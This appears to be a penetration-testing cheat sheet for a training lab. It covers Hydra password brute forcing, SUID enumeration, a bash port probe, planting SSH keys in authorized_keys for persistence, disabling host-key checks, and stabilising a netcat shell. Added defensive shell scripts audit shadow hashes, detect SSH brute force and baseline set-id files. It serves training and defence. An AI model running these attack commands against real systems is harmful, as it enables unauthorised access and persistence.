Linux

Generate /etc/shadow Password

# -6 selects SHA-512 crypt, which yields a $6$<salt>$<hash> string usable in /etc/shadow
openssl passwd -6 -salt salty 'Password123$'
genpasswd() { openssl passwd -6 -salt "$1" "$2"; }
genpasswd salty 'Password123$'
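Added example, not part of the original cheat sheet: the defender's side of the same format. The shell audit below reads shadow-format entries and reports which hash algorithm each account uses, so MD5/DES hashes and empty password fields stand out next to the `$6$` SHA-512 crypt form that `openssl passwd -6` produces. The sample entries are constructed and their hash bodies are placeholders, not real hashes.

```shell
# Added example (not from the original cheat sheet): classify the password
# field of every shadow-format line so weak algorithms and empty passwords
# stand out. Sample entries below are constructed; hash bodies are placeholders.

shadow_hash_type() {
    # $1 is the password field (second field) of one /etc/shadow line
    case "$1" in
        '')              echo "EMPTY-weak" ;;                # no password at all
        '*'|'!'*)        echo "locked" ;;                    # password login disabled
        '$6$'*)          echo "sha512crypt" ;;               # what openssl passwd -6 produces
        '$y$'*)          echo "yescrypt" ;;
        '$5$'*)          echo "sha256crypt" ;;
        '$2'[aby]'$'*)   echo "bcrypt" ;;
        '$1$'*)          echo "md5crypt-weak" ;;             # fast hash, cheap to crack
        *)               echo "descrypt-or-unknown-weak" ;;  # legacy 13-char DES or unknown
    esac
}

audit_shadow() {
    # Reads shadow-format lines from stdin, prints "user<TAB>type" per line,
    # returns 1 if any account is flagged weak (type ends in "-weak").
    rc=0
    while IFS=: read -r user pass _rest; do
        [ -z "$user" ] && continue
        t=$(shadow_hash_type "$pass")
        printf '%s\t%s\n' "$user" "$t"
        case "$t" in *-weak) rc=1 ;; esac
    done
    return $rc
}

# Constructed sample: four accounts, two of which should be flagged.
SAMPLE_SHADOW='root:$6$salty$PLACEHOLDERHASH:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
legacy:$1$abcd$PLACEHOLDERHASH:19000:0:99999:7:::
guest::19000:0:99999:7:::'

# Usage on a real system (as root): audit_shadow < /etc/shadow
printf '%s\n' "$SAMPLE_SHADOW" | audit_shadow || echo "weak entries found"
```

The return code lets the function sit in a cron job or CI check; the per-account output is what you read when it fires.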

Extract all URLs

grep -Eo "https?://[a-zA-Z0-9./?=_%:;#&-]*" inlanefreight | sort -u
...
https://www.inlanefreight.com/index.php/wp-json/
https://www.inlanefreight.com/index.php/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.inlanefreight.com%2F
https://www.inlanefreight.com/index.php/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.inlanefreight.com%2F&format=xml
https://www.inlanefreight.com/index.php/wp-json/wp/v2/pages/7
https://www.inlanefreight.com/wp-content/themes/ben_theme/css/animate.css?ver=5.6.14
...

Hydra

HTTP Form Login

hydra -l <username> -P <path/to/passwords> <IP> http-post-form "/route/to/login:username=^USER^&password=^PASS^:<Message If Login Is Incorrect>"

Use login as password

hydra -L users.txt -e s 10.129.1.198 http-post-form '/zabbix/index.php:name=^USER^&password=^PASS^&autologin=1&enter=Sign+in:is incorrect'

SSH

hydra -l <username> -P <path/to/passwords> <IP> ssh -t 4
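Added example, not part of the original cheat sheet: the trace a password-guessing run against sshd leaves behind is a burst of `Failed password` lines from one source in the auth log. This shell function counts failures per source address and reports the sources at or above a threshold. The log lines are constructed, and the default threshold of 5 is an assumption.

```shell
# Added example (not from the original cheat sheet): count sshd "Failed password"
# events per source IP in auth-log lines read from stdin and report the sources
# at or above a threshold. Log lines below are constructed.

ssh_bruteforce_sources() {
    # $1 = minimum failure count to report (default 5, an assumption).
    # Prints "<failures> <source-ip>", highest count first.
    awk -v thr="${1:-5}" '
        /sshd\[[0-9]+\]: Failed password for/ {
            # the source address is the field right after "from"
            for (i = 1; i <= NF; i++) if ($i == "from") fails[$(i + 1)]++
        }
        END {
            for (ip in fails)
                if (fails[ip] + 0 >= thr + 0) printf "%d %s\n", fails[ip], ip
        }
    ' | sort -rn
}

# Constructed sample: six failures from one address, one failure then a
# successful login from another.
SAMPLE_AUTH_LOG='Mar  4 10:00:01 host sshd[1201]: Failed password for invalid user admin from 10.10.14.5 port 40122 ssh2
Mar  4 10:00:01 host sshd[1203]: Failed password for invalid user test from 10.10.14.5 port 40124 ssh2
Mar  4 10:00:02 host sshd[1205]: Failed password for root from 10.10.14.5 port 40126 ssh2
Mar  4 10:00:02 host sshd[1207]: Failed password for root from 10.10.14.5 port 40128 ssh2
Mar  4 10:00:03 host sshd[1209]: Failed password for bob from 10.10.14.5 port 40130 ssh2
Mar  4 10:00:03 host sshd[1211]: Failed password for bob from 10.10.14.5 port 40132 ssh2
Mar  4 10:01:10 host sshd[1300]: Failed password for alice from 192.168.1.20 port 51000 ssh2
Mar  4 10:01:15 host sshd[1300]: Accepted password for alice from 192.168.1.20 port 51000 ssh2'

# Usage on a real host: ssh_bruteforce_sources 5 < /var/log/auth.log
printf '%s\n' "$SAMPLE_AUTH_LOG" | ssh_bruteforce_sources
```

The single failure followed by `Accepted password` from 192.168.1.20 is what a typo looks like; the six rapid failures against several usernames from 10.10.14.5 is what a tool with parallel tasks looks like, and is the line the function reports at the default threshold.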

Find all the SUID/SGID executables

# Find SUID files
find / -perm -4000 -type f -ls 2>/dev/null

# Find SUID files for USER
find / -perm -4000 -type f -user USER -ls 2>/dev/null

# Find SUID files for GROUP
find / -perm -4000 -type f -group GROUP -ls 2>/dev/null

# Find SUID or SGID files
find / -type f \( -perm -u+s -o -perm -g+s \) -ls 2>/dev/null
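Added example, not part of the original cheat sheet: the same `find` criteria turned into a baseline check. A list of SUID/SGID files is saved once, and a later rescan reports any set-id file that was not in the baseline, which is how an unexpected new setuid binary gets noticed. The demo tree is constructed in a temporary directory; the `/root/setid.baseline` path in the usage note is an assumed location.

```shell
# Added example (not from the original cheat sheet): baseline the SUID/SGID
# files on a host and report newcomers on a later scan. The demo tree below
# is constructed in a temp dir so the block runs without root.

find_setid() {
    # list regular files with the SUID or SGID bit under $1 (default /), sorted
    find "${1:-/}" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | LC_ALL=C sort
}

setid_new_since_baseline() {
    # $1 = baseline file written earlier with find_setid, $2 = directory to rescan
    # prints set-id files present now that are absent from the baseline
    find_setid "$2" | LC_ALL=C comm -13 "$1" -
}

setid_demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/usr/bin"
    : > "$tmp/usr/bin/passwd_like"; chmod 4755 "$tmp/usr/bin/passwd_like"  # known SUID file
    : > "$tmp/usr/bin/plain";       chmod 0755 "$tmp/usr/bin/plain"        # ordinary binary
    find_setid "$tmp" > "$tmp/baseline.txt"
    # later, something drops a new SGID file into the tree
    : > "$tmp/usr/bin/dropped";     chmod 2755 "$tmp/usr/bin/dropped"
    setid_new_since_baseline "$tmp/baseline.txt" "$tmp"   # prints only .../usr/bin/dropped
    rm -rf "$tmp"
}

# Usage on a real host (assumed baseline path):
#   find_setid / > /root/setid.baseline            # once, on a known-good system
#   setid_new_since_baseline /root/setid.baseline / # periodically
setid_demo
```

`comm` needs both inputs sorted the same way, which is why both sides go through `sort` under `LC_ALL=C`.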

Port Scan with Bash

host='1.2.3.4' # IP or Host
port='80'
(echo >/dev/tcp/${host}/${port}) &>/dev/null && echo "open" || echo "closed"

SSH

Upgrade to SSH

Local

ssh-keygen -f id_rsa -P x -q
echo "mkdir ~/.ssh; echo '$(cat id_rsa.pub)' > ~/.ssh/authorized_keys"

Remote

mkdir ~/.ssh; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1...wfXNOycqlPRe user@host' > ~/.ssh/authorized_keys

Always accept the host key on ssh connect

cat ~/.ssh/config
Host *
    StrictHostKeyChecking no
    UserKnownHostsFile=/dev/null

Note: this disables host key verification entirely, so ssh will no longer detect a changed or spoofed host key.

Connect to ssh with password

# Just connect
sshpass -p 'Password123$' ssh user@domain.tld

# Connect and forward local port 8500 to port 8500 on the remote host (-L, local port forwarding)
sshpass -p 'Password123$' ssh user@domain.tld -L 8500:0:8500

Note: Also works with other services like ftp.

Upgrade netcat (nc)

  1. Get a PTY (in the netcat shell)

    • python3 -c 'import pty;pty.spawn("/bin/bash")'
    • or: script /dev/null -qc /bin/bash

  2. Background the process

    • Ctrl+Z

  3. Get your terminal's rows and columns (in the local shell)

    • tput lines;tput cols

  4. Enter the command, then press ENTER twice to bring the session back

    • stty raw -echo;fg

  5. For better text wrapping (back in the netcat shell)

    • stty rows <rows> cols <columns>

  6. To be able to use the clear command

    • export TERM=xterm

# in the netcat shell (either one)
python3 -c 'import pty;pty.spawn("/bin/bash")'
script /dev/null -qc /bin/bash
# Ctrl+Z, then in the local shell (press ENTER twice afterwards)
stty raw -echo;fg;
# back in the netcat shell, with the values from tput lines;tput cols
stty rows 47 cols 211;export TERM=xterm

Note: This doesn't work with rlwrap!
